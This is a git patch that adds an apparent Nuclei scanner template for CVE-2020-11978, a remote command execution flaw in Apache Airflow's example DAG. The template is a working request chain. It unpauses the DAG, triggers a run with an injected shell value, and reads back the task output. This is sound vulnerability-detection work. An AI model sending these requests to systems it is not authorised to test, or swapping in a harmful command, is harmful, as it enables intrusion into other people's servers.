From 6652b2ddb6f5ce1c4852a71165a20a5be59026dc Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Thu, 3 Jun 2021 13:57:09 +0530
Subject: [PATCH] Added CVE-2020-11978

---
 cves/2020/CVE-2020-11978.yaml | 65 +++++++++++++++++++++++++++++++++++
 1 file changed, 65 insertions(+)
 create mode 100644 cves/2020/CVE-2020-11978.yaml

diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml
new file mode 100644
index 0000000000..e9964eedcd
--- /dev/null
+++ b/cves/2020/CVE-2020-11978.yaml
@@ -0,0 +1,65 @@
+id: CVE-2020-11978
+info:
+  name: Apache Airflow <= 1.10.10 - 'Example Dag' Remote Code Execution
+  author: pdteam
+  severity: high
+  description: An issue was found in Apache Airflow versions 1.10.10 and below. A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow which would allow any authenticated user to run arbitrary commands as the user running airflow worker/scheduler (depending on the executor in use). If you already have examples disabled by setting load_examples=False in the config then you are not vulnerable.
+  reference: |
+        - https://github.com/pberba/CVE-2020-11978
+        - https://nvd.nist.gov/vuln/detail/CVE-2020-11978
+        - https://twitter.com/wugeej/status/1400336603604668418
+  tags: cve,cve2020,apache,airflow,rce
+
+requests:
+  - raw:
+      - |
+        GET /api/experimental/test HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+      - |
+        GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+      - |
+        POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Content-Length: 85
+        Content-Type: application/json
+
+        {"conf": {"message": "\"; touch test #"}}
+
+      - |
+        GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+
+
+    extractors:
+      - type: regex
+        name: exec_date
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"execution_date":"([0-9-A-Z:+]+)"'
+
+    req-condition: true
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_4, "operator":"BashOperator")'
+          - 'contains(all_headers_4, "application/json")'
+        condition: and
+